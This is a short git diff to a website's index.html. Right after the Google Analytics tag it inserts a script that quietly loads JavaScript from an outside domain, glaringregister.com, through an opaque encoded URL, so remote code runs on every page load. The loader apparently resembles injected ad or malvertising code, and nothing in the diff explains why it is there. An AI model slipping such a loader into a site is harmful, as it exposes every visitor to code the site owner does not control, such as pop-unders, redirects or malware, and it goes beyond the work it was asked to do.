--- a/index.html
+++ b/index.html
@@ -20,6 +20,16 @@
 
   gtag('config', 'G-6FTBT53CEV');
 </script>
+<script>
+  (function(rct){
+  var d = document,
+      s = d.createElement('script'),
+      l = d.scripts[d.scripts.length - 1];
+  s.settings = rct || {};
+  s.src = "\/\/glaringregister.com\/a.WZ5Pw_YkWgdElAQU2p9DkxZhTP9b6Ibt2f5elSSsWIQX9mN\/DPksw\/M-TJQ\/zJMRSJ0V0xOqTFA_xTNJDSMWyv";
+  l.parentNode.insertBefore(s, l);
+  })({})
+  </script>
 </head>
 <body>
     <nav class="navbar navbar-expand-lg navbar-dark"
